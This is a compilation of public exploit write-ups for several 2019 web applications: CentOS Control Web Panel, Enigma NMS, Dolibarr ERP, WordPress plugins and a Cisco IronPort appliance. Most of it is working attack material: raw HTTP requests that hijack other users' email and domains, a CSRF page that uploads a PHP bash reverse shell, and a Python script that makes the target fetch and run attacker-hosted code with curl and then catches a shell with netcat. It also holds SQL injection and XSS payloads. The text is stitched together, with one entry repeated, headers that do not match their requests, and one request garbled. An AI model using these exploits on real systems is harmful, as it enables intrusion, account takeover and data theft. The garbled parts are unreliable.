Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=bob2@bob2&goto=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14725 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updquotaemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&quota=1048576000

-------------------------------------------------------------------------------------------------------------
CVE-2019-14726 : CWP (CentOS Control Web Panel 0.9.8.851) Modify forward mail destination on victim's account
-------------------------------------------------------------------------------------------------------------

# Access

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=paserrecord HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept 
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 16
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com

-------------------------------------------------------------------------------

# Delete

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=addregdns HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept 
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 111
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com&namereg=Attacker.com&valuereg=192.168.10.200&cachereg=14400&reg=A&flag=undefined&tag=undefined

-------------------------------------------------------------------------------------------------------------
CVE-2019-14727 : CWP (CentOS Control Web Panel 0.9.8.851) Change other email password
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=changpassemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 45
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&pass1email=P@ssw0rd

-------------------------------------------------------------------------------------------------------------
CVE-2019-14728 : CWP (CentOS Control Web Panel 0.9.8.851) Add forward mail to other account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=addforwar HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

forwaraddres=bob2&domainforwar=bob2&forwarders=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14729 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other sub-domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=subdomains&acc=subdomaindelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=subdomains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>&subdomain=<TARGET-SUBDOMAIN>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14730 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=domains&acc=verifsubdomain HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 12
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=domains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>

#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF)        #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16068                                            #   
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/        -= Enigma CSRF by @xerubus =-       
|   D _]/\ \     -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    

The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.

<html>
<script>history.pushState('', '', '/')</script>
<script>
    function submitRequest()
    {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
      xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
      xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
      xhr.withCredentials = true;

      var body = "-----------------------------208051173310446317141640314495\r\n" + 
"Content-Disposition: form-data; name=\"action\"\r\n" + 
"\r\n" + 
"system_upgrade\r\n" + 
"-----------------------------208051173310446317141640314495\r\n" + 
"Content-Disposition: form-data; name=\"action_aux\"\r\n" + 
"\r\n" + 
"upload_file_complete\r\n" + 
"-----------------------------208051173310446317141640314495\r\n" + 
"Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + 
"Content-Type: application/x-php\r\n" + 
"\r\n" + 
"\x3c?php\n" + 
"\n" + 
"exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + 
"\n" + 
"?\x3e\n" + 
"\r\n" + 
"-----------------------------208051173310446317141640314495\r\n" + 
"Content-Disposition: form-data; name=\"upfile_name\"\r\n" + 
"\r\n" + 
"evil.php\r\n" + 
"-----------------------------208051173310446317141640314495--\r\n";

      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
    }
    submitRequest();
    window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
</script>
<body onload="submitRequest();">
</body>
</html>

# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================


elemid (POST) - Sql injection PoC


POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Cookie:
DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45
Connection: close
Upgrade-Insecure-Requests: 1

token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi]



Parameter: elemid (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
    Payload:
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT
(ELT(7549=7549,1))),0x7176787a71))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload:
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)

#!/usr/bin/python
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS OS Command Injection                     #
# NETSAS Pty Ltd Enigma NMS                                          #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16072                                            #
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#

import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading

os.system('clear')

print("""\
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/  -= Enigma NMS Reverse Shell by @xerubus =-    
|   D _]/\ \     -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    
""")

enigma_host = raw_input("Enter Enigma NMS IP address:\t")
attack_host = raw_input("Enter Attacker IP address:\t")
rev_sh_port = raw_input("Enter reverse shell port:\t")
web_svr_port = raw_input("Enter web server port:\t\t")
user = raw_input("Enter Username:\t\t\t")
os.system("stty -echo")
password = raw_input("Enter Password (no echo):\t")
os.system("stty echo")

enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

print "\n\n[+] Building PHP reverse shell"
f=open("evil.php","w")
f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
f.close()

# Create simple webserver hosting evil php file
print "[+] Hosting PHP reverse shell"
web_svr_port = str(web_svr_port)
web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)

# Create netcat listener
print "[+] Creating listener on port " + rev_sh_port
subprocess.Popen(["nc", "-nvlp", rev_sh_port])

# Send payload to Enigma NMS
print "[+] Sending payload\n"
try:
    r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
except:
    pass

print "\n[+] Cleaning up mess..."

# Shut down http server
os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)

# Exploit Title: WordPress Plugin Sell Downloads 1.0.86 - Cross Site Scripting
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: September 09,2019
# Vendor Homepage: https://wordpress.dwbooster.com/content-tools/sell-downloads
# Software Link : https://wordpress.org/plugins/sell-downloads/
# Tested Version: 1.0.86
# Tested on: Parrot OS, Wordpress 5.1.1


# PoC:
1- Go to "Products for Sale" section
2- Click on "Add New"
3- In opend window click on "Add Comment"
4- Fill comment as "/><img src=x onerror="alert()"> or "/><input type="text" onclick="alert()">
5- Click on "Publish" (or "Update" if you editing an existing product)
6- You will see a pop-up (also if click on input), Also if you go to product link will see the pop-up.

# Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================


actioncode (POST) - Sql injection PoC

http request:

POST /dolibarr-10.0.1/htdocs/comm/action/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/dolibarr-10.0.1/htdocs/comm/action/card.php?action=edit&id=774
Content-Type: application/x-www-form-urlencoded
Content-Length: 610
Cookie:
DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
Connection: close
Upgrade-Insecure-Requests: 1

token=%242y%2410%24hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW%2FIC0mt8vk7%2FGTtU8a&action=update&id=774&ref_ext=&actioncode=[SQLi]&label=Product+created&ap=09%2F05%2F2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09%2F05%2F2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save



Parameter: actioncode (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause
    Payload:
token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
RLIKE (SELECT (CASE WHEN (5096=5096) THEN 0x41435f4f54485f4155544f ELSE
0x28 END))--
HQaG&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
    Payload:
token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
AND (SELECT 1665 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT
(ELT(1665=1665,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
XqJd&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload:
token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
AND (SELECT 6833 FROM (SELECT(SLEEP(5)))gCwf)--
jPLl&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save

.
.
.
.
.

demand_reason_id, availability_id (POST) - Sql injection PoC

http request:

POST /dolibarr-10.0.1/htdocs/comm/propal/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/dolibarr-10.0.1/htdocs/comm/propal/card.php?action=create&leftmenu=propals
Content-Type: application/x-www-form-urlencoded
Content-Length: 471
Cookie:
DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
Connection: close
Upgrade-Insecure-Requests: 1

token=%242y%2410%24L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09%2F09%2F2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=[SQLi]&availability_id=[SQLi]&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty



Parameter: demand_reason_id (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause
    Payload:
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
RLIKE (SELECT (CASE WHEN (8405=8405) THEN 0 ELSE 0x28
END))&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
    Payload:
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
OR (SELECT 8076 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
(ELT(8076=8076,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a)&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

.
.

Parameter: availability_id (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause
    Payload:
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
RLIKE (SELECT (CASE WHEN (6909=6909) THEN 0 ELSE 0x28
END))&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
    Payload:
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
OR (SELECT 3789 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
(ELT(3789=3789,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload:
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
AND (SELECT 9904 FROM
(SELECT(SLEEP(5)))ZKPW)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS search_pattern SQL Injection             #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16065                                            #
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/        -= Enigma SQLi by @xerubus =-    
|   D _]/\ \     -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    

Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
Vulnerable Parameter:  search_pattern (GET)
Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='

# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================


elemid (POST) - Sql injection PoC


POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Cookie:
DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45
Connection: close
Upgrade-Insecure-Requests: 1

token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi]



Parameter: elemid (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
    Payload:
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT
(ELT(7549=7549,1))),0x7176787a71))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload:
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Qwiz online quizzes and flashcards 3.36

Qwiz online quizzes and flashcards is prone to a reflected cross-site
scripting vulnerability because it fails to sufficiently sanitize
user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue following steps:
The XSS reflected because the value url is not filter correctly:

Demo Request GET:
http://localhost/wordpress/wp-content/plugins/qwiz-online-quizzes-and-flashcards/registration_complete.php?&qname=%3C/script%3E%3Cscript%3Ealert(%22R1XS4.COM%22)%3C/script%3E

<?php
//
//  Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit
//
//
//  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
//
//
//  Disclaimer:
//  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
//  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
//  caused by direct or indirect use of the  information or functionality provided by these programs. 
//  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
//  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
//  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
//  responsibility.
//   
//  Use them at your own risk!
//
//
//      [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php
//  PHP <HIDDEN> Development Server started at Sun Sep  8 16:47:43 2019
//  Listening on http://localhost:1337
//  Document root is /home/test/ironport
//  Press Ctrl-C to quit.
//  * About to connect() to 192.168.1.1 port 443 (#0)
//  *   Trying 192.168.1.1... * connected
//  * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
//  * Initializing NSS with certpath: sql:/etc/pki/nssdb
//  * skipping SSL peer certificate verification
//  * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
//  * Server certificate:
//  *   subject: 
//  *   start date: Mar 19 00:00:00 2018 GMT
//  *   expire date: Mar 18 23:59:59 2020 GMT
//  *   common name:   
//  *   issuer: 
//  > GET / HTTP/1.1
//  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
//  Cache-Control: no-cache
//  Content-Type: application/x-www-form-urlencoded; charset=utf-8
//  Host: scam-page.com
//  Referer: scam-page.com
//  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//  
//  * HTTP 1.0, assume close after body
